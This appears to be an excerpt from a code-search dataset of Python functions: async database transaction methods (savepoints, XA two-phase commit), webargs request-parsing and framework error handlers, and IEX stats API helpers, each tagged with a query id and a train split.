    The returned object is an instance of :class:`.NestedTransaction`.

    Nested transactions require SAVEPOINT support in the
    underlying database.  Any transaction in the hierarchy may
    .commit() and .rollback(), however the outermost transaction
    still controls the overall .commit() or .rollback() of the
    transaction of a whole.
    """
    if self._transaction is None:
        # No transaction is open yet: a "nested" begin degrades to a
        # plain root transaction.
        self._transaction = RootTransaction(self)
        await self._begin_impl()
    else:
        # A transaction exists: nest via a SAVEPOINT under it.
        self._transaction = NestedTransaction(self, self._transaction)
        self._transaction._savepoint = await self._savepoint_impl()
    return self._transaction
python
{ "resource": "" }
q29766
SAConnection.begin_twophase
train
async def begin_twophase(self, xid=None):
    """Begin a two-phase or XA transaction and return a transaction
    handle.

    The returned object is an instance of TwoPhaseTransaction, which
    in addition to the methods provided by Transaction, also provides
    a TwoPhaseTransaction.prepare() method.

    xid - the two phase transaction id.  If not supplied, a random id
    will be generated.

    :raises InvalidRequestError: if another transaction is already open
        on this connection.
    """
    if self._transaction is not None:
        raise exc.InvalidRequestError(
            "Cannot start a two phase transaction when a transaction "
            "is already in progress.")
    if xid is None:
        xid = self._dialect.create_xid()
    self._transaction = TwoPhaseTransaction(self, xid)
    # Open the XA branch on the server for the chosen transaction id.
    await self.execute("XA START %s", xid)
    return self._transaction
python
{ "resource": "" }
q29767
SAConnection.rollback_prepared
train
async def rollback_prepared(self, xid, *, is_prepared=True):
    """Roll back a two-phase (XA) transaction.

    When *is_prepared* is False the XA branch is first ended with
    ``XA END`` before being rolled back.
    """
    if not is_prepared:
        await self.execute("XA END '%s'" % xid)
    await self.execute("XA ROLLBACK '%s'" % xid)
python
{ "resource": "" }
q29768
SAConnection.commit_prepared
train
async def commit_prepared(self, xid, *, is_prepared=True):
    """Commit a two-phase (XA) transaction.

    When *is_prepared* is False the XA branch is first ended with
    ``XA END`` before being committed.
    """
    if not is_prepared:
        await self.execute("XA END '%s'" % xid)
    await self.execute("XA COMMIT '%s'" % xid)
python
{ "resource": "" }
q29769
SAConnection.close
train
async def close(self):
    """Close this SAConnection.

    This results in a release of the underlying database
    resources, that is, the underlying connection referenced
    internally. The underlying connection is typically restored
    back to the connection-holding Pool referenced by the Engine
    that produced this SAConnection. Any transactional state
    present on the underlying connection is also unconditionally
    released via calling Transaction.rollback() method.

    After .close() is called, the SAConnection is permanently in a
    closed state, and will allow no further operations.
    """
    if self._connection is None:
        # Already closed: idempotent no-op.
        return

    if self._transaction is not None:
        await self._transaction.rollback()
        self._transaction = None
    # don't close underlying connection, it can be reused by pool
    # conn.close()

    self._engine.release(self)
    self._connection = None
    self._engine = None
python
{ "resource": "" }
q29770
ResultProxy.first
train
async def first(self):
    """Fetch the first row, closing the result set unconditionally.

    Returns None if no row is present.
    """
    if self._metadata is None:
        self._non_result()
    try:
        row = await self.fetchone()
    finally:
        await self.close()
    return row
python
{ "resource": "" }
q29771
get_value
train
def get_value(data, name, field, allow_many_nested=False):
    """Get a value from a dictionary. Handles ``MultiDict`` types when
    ``multiple=True``. If the value is not found, return `missing`.

    :param object data: Mapping (e.g. `dict`) or list-like instance to
        pull the value from.
    :param str name: Name of the key.
    :param bool multiple: Whether to handle multiple values.
    :param bool allow_many_nested: Whether to allow a list of nested objects
        (it is valid only for JSON format, so it is set to True in ``parse_json``
        methods).
    """
    missing_value = missing
    # A many=True Nested field may receive the whole collection directly
    # (JSON bodies that are a top-level list).
    if allow_many_nested and isinstance(field, ma.fields.Nested) and field.many:
        if is_collection(data):
            return data

    if not hasattr(data, "get"):
        return missing_value

    multiple = is_multiple(field)
    val = data.get(name, missing_value)
    if multiple and val is not missing:
        # Prefer the multidict-specific accessors when available so all
        # values for the key are returned, not just the first.
        if hasattr(data, "getlist"):
            return data.getlist(name)
        elif hasattr(data, "getall"):
            return data.getall(name)
        elif isinstance(val, (list, tuple)):
            return val
        if val is None:
            return None
        else:
            # Single value for a multiple field: wrap it in a list.
            return [val]
    return val
python
{ "resource": "" }
q29772
Parser._validated_locations
train
def _validated_locations(self, locations): """Ensure that the given locations argument is valid. :raises: ValueError if a given locations includes an invalid location. """ # The set difference between the given locations and the available locations # will be the set of invalid locations valid_locations = set(self.__location_map__.keys()) given = set(locations) invalid_locations = given - valid_locations if len(invalid_locations): msg = "Invalid locations arguments: {0}".format(list(invalid_locations)) raise ValueError(msg) return locations
python
{ "resource": "" }
q29773
Parser.parse_arg
train
def parse_arg(self, name, field, req, locations=None):
    """Parse a single argument from a request.

    .. note::

        This method does not perform validation on the argument.

    :param str name: The name of the value.
    :param marshmallow.fields.Field field: The marshmallow `Field` for the request
        parameter.
    :param req: The request object to parse.
    :param tuple locations: The locations ('json', 'querystring', etc.) where
        to search for the value.
    :return: The unvalidated argument value or `missing` if the value cannot
        be found on the request.
    """
    # A per-field 'location' in the field metadata overrides any
    # locations passed to this call.
    location = field.metadata.get("location")
    if location:
        locations_to_check = self._validated_locations([location])
    else:
        locations_to_check = self._validated_locations(locations or self.locations)

    # First location that yields a value wins.
    for location in locations_to_check:
        value = self._get_value(name, field, req=req, location=location)
        # Found the value; validate and return it
        if value is not missing:
            return value
    return missing
python
{ "resource": "" }
q29774
Parser._parse_request
train
def _parse_request(self, schema, req, locations):
    """Return a parsed arguments dictionary for the current request.

    :param schema: `marshmallow.Schema` describing the expected args.
    :param req: The request object to parse.
    :param locations: locations to search for each argument.
    """
    if schema.many:
        assert (
            "json" in locations
        ), "schema.many=True is only supported for JSON location"
        # The ad hoc Nested field is more like a workaround or a helper,
        # and it servers its purpose fine. However, if somebody has a desire
        # to re-design the support of bulk-type arguments, go ahead.
        parsed = self.parse_arg(
            name="json",
            field=ma.fields.Nested(schema, many=True),
            req=req,
            locations=locations,
        )
        if parsed is missing:
            parsed = []
    else:
        argdict = schema.fields
        parsed = {}
        for argname, field_obj in iteritems(argdict):
            if MARSHMALLOW_VERSION_INFO[0] < 3:
                parsed_value = self.parse_arg(argname, field_obj, req, locations)
                # If load_from is specified on the field, try to parse from that key
                if parsed_value is missing and field_obj.load_from:
                    parsed_value = self.parse_arg(
                        field_obj.load_from, field_obj, req, locations
                    )
                    argname = field_obj.load_from
            else:
                # marshmallow 3 renamed load_from -> data_key.
                argname = field_obj.data_key or argname
                parsed_value = self.parse_arg(argname, field_obj, req, locations)
            if parsed_value is not missing:
                parsed[argname] = parsed_value
    return parsed
python
{ "resource": "" }
q29775
Parser._get_schema
train
def _get_schema(self, argmap, req):
    """Return a `marshmallow.Schema` for the given argmap and request.

    :param argmap: Either a `marshmallow.Schema`, `dict`
        of argname -> `marshmallow.fields.Field` pairs, or a callable that
        returns a `marshmallow.Schema` instance.
    :param req: The request object being parsed.
    :rtype: marshmallow.Schema
    """
    # Accept, in order: a schema instance, a schema class, a factory
    # callable (given the request), or a plain field dict.
    if isinstance(argmap, ma.Schema):
        schema = argmap
    elif isinstance(argmap, type) and issubclass(argmap, ma.Schema):
        schema = argmap()
    elif callable(argmap):
        schema = argmap(req)
    else:
        schema = dict2schema(argmap, self.schema_class)()
    if MARSHMALLOW_VERSION_INFO[0] < 3 and not schema.strict:
        # marshmallow 2 only: without strict=True, load() collects errors
        # instead of raising, so the parser's error handler never fires.
        warnings.warn(
            "It is highly recommended that you set strict=True on your schema "
            "so that the parser's error handler will be invoked when expected.",
            UserWarning,
        )
    return schema
python
{ "resource": "" }
q29776
Parser.parse
train
def parse(
    self,
    argmap,
    req=None,
    locations=None,
    validate=None,
    error_status_code=None,
    error_headers=None,
):
    """Main request parsing method.

    :param argmap: Either a `marshmallow.Schema`, a `dict`
        of argname -> `marshmallow.fields.Field` pairs, or a callable
        which accepts a request and returns a `marshmallow.Schema`.
    :param req: The request object to parse.
    :param tuple locations: Where on the request to search for values.
        Can include one or more of ``('json', 'querystring', 'form',
        'headers', 'cookies', 'files')``.
    :param callable validate: Validation function or list of validation functions
        that receives the dictionary of parsed arguments. Validator either returns a
        boolean or raises a :exc:`ValidationError`.
    :param int error_status_code: Status code passed to error handler functions when
        a `ValidationError` is raised.
    :param dict error_headers: Headers passed to error handler functions when a
        a `ValidationError` is raised.

    :return: A dictionary of parsed arguments
    """
    self.clear_cache()  # in case someone used `parse_*()`
    req = req if req is not None else self.get_default_request()
    assert req is not None, "Must pass req object"
    data = None
    validators = _ensure_list_of_callables(validate)
    # A clone is used so per-request state never leaks into this parser.
    parser = self._clone()
    schema = self._get_schema(argmap, req)
    try:
        parsed = parser._parse_request(
            schema=schema, req=req, locations=locations or self.locations
        )
        result = schema.load(parsed)
        # marshmallow 2 returns a (data, errors) result object;
        # marshmallow 3 returns the deserialized data directly.
        data = result.data if MARSHMALLOW_VERSION_INFO[0] < 3 else result
        parser._validate_arguments(data, validators)
    except ma.exceptions.ValidationError as error:
        parser._on_validation_error(
            error, req, schema, error_status_code, error_headers
        )
    return data
python
{ "resource": "" }
q29777
Parser.use_kwargs
train
def use_kwargs(self, *args, **kwargs):
    """Decorator that injects parsed arguments into a view function or method
    as keyword arguments.

    This is a shortcut to :meth:`use_args` with ``as_kwargs=True``.

    Example usage with Flask: ::

        @app.route('/echo', methods=['get', 'post'])
        @parser.use_kwargs({'name': fields.Str()})
        def greet(name):
            return 'Hello ' + name

    Receives the same ``args`` and ``kwargs`` as :meth:`use_args`.
    """
    forwarded = dict(kwargs, as_kwargs=True)
    return self.use_args(*args, **forwarded)
python
{ "resource": "" }
q29778
Parser.handle_error
train
def handle_error(
    self, error, req, schema, error_status_code=None, error_headers=None
):
    """Fallback handler for parsing errors: record the error and re-raise.

    Framework-specific subclasses override this to translate the
    ``ValidationError`` into an HTTP error response.
    """
    logger.error(error)
    raise error
python
{ "resource": "" }
q29779
parse_json_body
train
def parse_json_body(req):
    """Return the decoded JSON body from the request.

    Returns ``{}`` when the content type is not JSON or the body cannot be
    decoded as text, and ``core.missing`` when the body is empty.
    """
    content_type = req.headers.get("Content-Type")
    # Guard clause: non-JSON (or absent) content type yields an empty mapping.
    if not (content_type and core.is_json(content_type)):
        return {}
    try:
        return core.parse_json(req.body)
    except TypeError:
        # Body was not a decodable str/bytes value.
        return {}
    except json.JSONDecodeError as e:
        if e.doc == "":
            # Empty body: distinguish "nothing sent" from "invalid JSON".
            return core.missing
        raise
python
{ "resource": "" }
q29780
get_value
train
def get_value(d, name, field):
    """Handle gets from 'multidicts' made of lists.

    It handles cases: ``{"key": [value]}`` and ``{"key": value}``

    :param d: Mapping to read from.
    :param name: Key to look up.
    :param field: The marshmallow field the value is destined for; list-like
        fields cause every element to be returned (and decoded).
    :return: The (decoded) value, or ``core.missing`` when absent.
    """
    value = d.get(name, core.missing)
    if value is core.missing:
        return core.missing
    # Fix: the original re-checked `value is not core.missing` here even
    # though the early return above already guarantees it; the redundant
    # condition (and a redundant `else` after `return`) has been removed.
    if core.is_multiple(field):
        return [
            decode_argument(v, name) if isinstance(v, basestring) else v
            for v in value
        ]
    ret = value
    if value and isinstance(value, (list, tuple)):
        # Single-valued field stored as a one-element list: unwrap it.
        ret = value[0]
    if isinstance(ret, basestring):
        return decode_argument(ret, name)
    return ret
python
{ "resource": "" }
q29781
TornadoParser.handle_error
train
def handle_error(self, error, req, schema, error_status_code, error_headers):
    """Handle a parsing error by raising `tornado.web.HTTPError`.

    The error messages are attached to the exception so the handler can
    serialize them in the response body.
    """
    status_code = error_status_code or self.DEFAULT_VALIDATION_STATUS
    # Tornado has no built-in reason phrase for 422, so supply one.
    reason = "Unprocessable Entity" if status_code == 422 else None
    raise HTTPError(
        status_code,
        log_message=str(error.messages),
        reason=reason,
        messages=error.messages,
        headers=error_headers,
    )
python
{ "resource": "" }
q29782
PyramidParser.parse_matchdict
train
def parse_matchdict(self, req, name, field):
    """Pull a value out of the Pyramid route ``matchdict``."""
    matchdict = req.matchdict
    return core.get_value(matchdict, name, field)
python
{ "resource": "" }
q29783
PyramidParser.handle_error
train
def handle_error(self, error, req, schema, error_status_code, error_headers):
    """Handle a parsing error by raising a Pyramid JSON error response.

    Aborts the current HTTP request with a 400-class response whose body
    contains the serialized validation messages.
    """
    status_code = error_status_code or self.DEFAULT_VALIDATION_STATUS
    response = exception_response(
        status_code,
        detail=text_type(error),
        headers=error_headers,
        content_type="application/json",
    )
    payload = json.dumps(error.messages)
    # On Python 2, json.dumps may return unicode; the body must be bytes.
    if isinstance(payload, text_type):
        payload = payload.encode("utf-8")
    response.body = payload
    raise response
python
{ "resource": "" }
q29784
route
train
def route(*args, response_formatter=jsonify, **kwargs):
    """Combines `Flask.route` and webargs parsing. Allows arguments to be
    specified as function annotations. An output schema can optionally be
    specified by a return annotation.

    :param args: Positional arguments forwarded to ``app.route``.
    :param response_formatter: Callable used to turn the view's result into
        a Flask response (defaults to ``jsonify``).
    :param kwargs: Keyword arguments forwarded to ``app.route``.
    """

    def decorator(func):
        @app.route(*args, **kwargs)
        @functools.wraps(func)
        def wrapped_view(*a, **kw):
            annotations = getattr(func, "__annotations__", {})
            # Field-valued annotations describe request arguments; the
            # "return" annotation (if any) is the response schema.
            reqargs = {
                name: value
                for name, value in annotations.items()
                if isinstance(value, fields.Field) and name != "return"
            }
            response_schema = annotations.get("return")
            parsed = parser.parse(reqargs, request)
            kw.update(parsed)
            # Fix: call the view exactly once. The original called
            # func(*a, **kw) a second time in the no-schema branch,
            # running any side effects twice.
            response_data = func(*a, **kw)
            if response_schema:
                return response_formatter(response_schema.dump(response_data).data)
            return response_formatter(response_data)

        return wrapped_view

    return decorator
python
{ "resource": "" }
q29785
BaseRequestHandler.write_error
train
def write_error(self, status_code, **kwargs):
    """Serialize marshmallow validation errors as a JSON error body."""
    self.set_header("Content-Type", "application/json")
    if "exc_info" in kwargs:
        # exc_info is the usual (type, value, traceback) triple.
        exc = kwargs["exc_info"][1]
        if hasattr(exc, "messages"):
            self.write({"errors": exc.messages})
            extra_headers = getattr(exc, "headers", None)
            if extra_headers:
                for name, val in extra_headers.items():
                    self.set_header(name, val)
    self.finish()
python
{ "resource": "" }
q29786
HTTPError.to_dict
train
def to_dict(self, *args, **kwargs):
    """Extend ``falcon.HTTPError`` serialization with validation messages."""
    data = super(HTTPError, self).to_dict(*args, **kwargs)
    if self.errors is not None:
        data["errors"] = self.errors
    return data
python
{ "resource": "" }
q29787
FalconParser.parse_headers
train
def parse_headers(self, req, name, field): """Pull a header value from the request.""" # Use req.get_headers rather than req.headers for performance return req.get_header(name, required=False) or core.missing
python
{ "resource": "" }
q29788
FalconParser.parse_cookies
train
def parse_cookies(self, req, name, field):
    """Pull a cookie value from the request.

    ``req.cookies`` is memoized in the parser cache so repeated lookups
    during one parse don't re-read the request.
    """
    try:
        cookies = self._cache["cookies"]
    except KeyError:
        cookies = self._cache["cookies"] = req.cookies
    return core.get_value(cookies, name, field)
python
{ "resource": "" }
q29789
FalconParser.get_request_from_view_args
train
def get_request_from_view_args(self, view, args, kwargs):
    """Fetch the request from a falcon responder's positional arguments.

    Falcon calls responders as ``(self, req, resp, ...)``, so the request
    is always the second positional argument.
    """
    request = args[1]
    assert isinstance(request, falcon.Request), "Argument is not a falcon.Request"
    return request
python
{ "resource": "" }
q29790
FalconParser.handle_error
train
def handle_error(self, error, req, schema, error_status_code, error_headers):
    """Translate a parsing error into a falcon ``HTTPError`` response."""
    code = error_status_code or self.DEFAULT_VALIDATION_STATUS
    # Falcon needs a status *string*; unknown codes are a programmer error.
    if code not in status_map:
        raise LookupError("Status code {0} not supported".format(error_status_code))
    raise HTTPError(status_map[code], errors=error.messages, headers=error_headers)
python
{ "resource": "" }
q29791
AsyncParser.parse
train
async def parse(
    self,
    argmap: ArgMap,
    req: Request = None,
    locations: typing.Iterable = None,
    validate: Validate = None,
    error_status_code: typing.Union[int, None] = None,
    error_headers: typing.Union[typing.Mapping[str, str], None] = None,
) -> typing.Union[typing.Mapping, None]:
    """Coroutine variant of `webargs.core.Parser`.

    Receives the same arguments as `webargs.core.Parser.parse`.
    Returns the parsed-argument mapping, or ``None`` if the error
    handler swallows the ``ValidationError`` instead of raising.
    """
    self.clear_cache()  # in case someone used `parse_*()`
    # Fall back to the framework-specific default request when none is given.
    req = req if req is not None else self.get_default_request()
    assert req is not None, "Must pass req object"
    data = None
    validators = core._ensure_list_of_callables(validate)
    schema = self._get_schema(argmap, req)
    try:
        # Unlike the sync Parser, request parsing is awaited here so
        # location readers may be coroutines (e.g. reading a JSON body).
        parsed = await self._parse_request(
            schema=schema, req=req, locations=locations or self.locations
        )
        result = schema.load(parsed)
        # marshmallow 2 returns a (data, errors) result object; marshmallow 3
        # returns the deserialized data directly.
        data = result.data if core.MARSHMALLOW_VERSION_INFO[0] < 3 else result
        self._validate_arguments(data, validators)
    except ma.exceptions.ValidationError as error:
        # The async error hook is awaited as well; it typically raises an
        # HTTP error, in which case `data` is never returned.
        await self._on_validation_error(
            error, req, schema, error_status_code, error_headers
        )
    return data
python
{ "resource": "" }
q29792
AIOHTTPParser.parse_cookies
train
def parse_cookies(self, req: Request, name: str, field: Field) -> typing.Any:
    """Read *name* from the request's cookie jar."""
    cookies = req.cookies
    return core.get_value(cookies, name, field)
python
{ "resource": "" }
q29793
AIOHTTPParser.parse_match_info
train
def parse_match_info(self, req: Request, name: str, field: Field) -> typing.Any:
    """Read *name* from the aiohttp route ``match_info`` mapping."""
    match_info = req.match_info
    return core.get_value(match_info, name, field)
python
{ "resource": "" }
q29794
AIOHTTPParser.handle_error
train
def handle_error(
    self,
    error: ValidationError,
    req: Request,
    schema: Schema,
    error_status_code: typing.Union[int, None] = None,
    error_headers: typing.Union[typing.Mapping[str, str], None] = None,
) -> "typing.NoReturn":
    """Handle ValidationErrors and return a JSON response of error messages
    to the client.
    """
    status = error_status_code or self.DEFAULT_VALIDATION_STATUS
    # Unknown status codes have no matching aiohttp exception class.
    if status not in exception_map:
        raise LookupError("No exception for {0}".format(error_status_code))
    raise exception_map[status](
        body=json.dumps(error.messages).encode("utf-8"),
        headers=error_headers,
        content_type="application/json",
    )
python
{ "resource": "" }
q29795
BottleParser.handle_error
train
def handle_error(self, error, req, schema, error_status_code, error_headers):
    """Abort the current bottle request with the validation messages.

    Raises ``bottle.HTTPError`` carrying the original exception.
    """
    raise bottle.HTTPError(
        status=error_status_code or self.DEFAULT_VALIDATION_STATUS,
        body=error.messages,
        headers=error_headers,
        exception=error,
    )
python
{ "resource": "" }
q29796
handle_request_parsing_error
train
def handle_request_parsing_error(err, req, schema, error_status_code, error_headers):
    """webargs error handler that uses Flask-RESTful's abort function to return
    a JSON error response to the client.
    """
    # abort() raises an HTTPException, so this function never returns.
    # NOTE(review): error_headers is accepted but not forwarded to abort().
    abort(error_status_code, errors=err.messages)
python
{ "resource": "" }
q29797
DateAddResource.post
train
def post(self, value, addend, unit):
    """A date adder endpoint.

    Adds *addend* minutes (when ``unit == "minutes"``) or days (otherwise)
    to *value*, defaulting to the current UTC time when *value* is falsy,
    and returns the result as an ISO-8601 string.
    """
    # NOTE(review): datetime.utcnow() is naive (and deprecated in 3.12+);
    # kept for behavior compatibility.
    base = value if value else dt.datetime.utcnow()
    if unit == "minutes":
        offset = dt.timedelta(minutes=addend)
    else:
        offset = dt.timedelta(days=addend)
    return {"result": (base + offset).isoformat()}
python
{ "resource": "" }
q29798
get_stats_daily
train
def get_stats_daily(start=None, end=None, last=None, **kwargs):
    """
    Stats Historical Daily

    This call will return daily stats for a given month or day.

    .. warning:: This endpoint is marked as "in development" by the provider.

    Reference: https://iexcloud.io/docs/api/#stats-historical-daily-in-dev

    Data Weighting: ``Free``

    Parameters
    ----------
    start: datetime.datetime, default None, optional
        Start of data retrieval period
    end: datetime.datetime, default None, optional
        End of data retrieval period
    last: int, default None, optional
        Used in place of date range to retrieve previous number of trading
        days (up to 90)
    kwargs:
        Additional Request Parameters (see base class)

    Returns
    -------
    The fetched daily summary data (format determined by the reader's
    output settings).
    """
    # Normalize/validate the date range before handing it to the reader.
    start, end = _sanitize_dates(start, end)
    return DailySummaryReader(start=start, end=end, last=last, **kwargs).fetch()
python
{ "resource": "" }
q29799
get_stats_summary
train
def get_stats_summary(start=None, end=None, **kwargs):
    """
    Stats Historical Summary

    Reference: https://iexcloud.io/docs/api/#stats-historical-summary

    Data Weighting: ``Free``

    Parameters
    ----------
    start: datetime.datetime, default None, optional
        Start of data retrieval period
    end: datetime.datetime, default None, optional
        End of data retrieval period
    kwargs:
        Additional Request Parameters (see base class)

    Returns
    -------
    The fetched monthly summary data (format determined by the reader's
    output settings).
    """
    # NOTE(review): unlike get_stats_daily, the dates are not sanitized
    # here — the reader is expected to handle raw start/end values.
    return MonthlySummaryReader(start=start, end=end, **kwargs).fetch()
python
{ "resource": "" }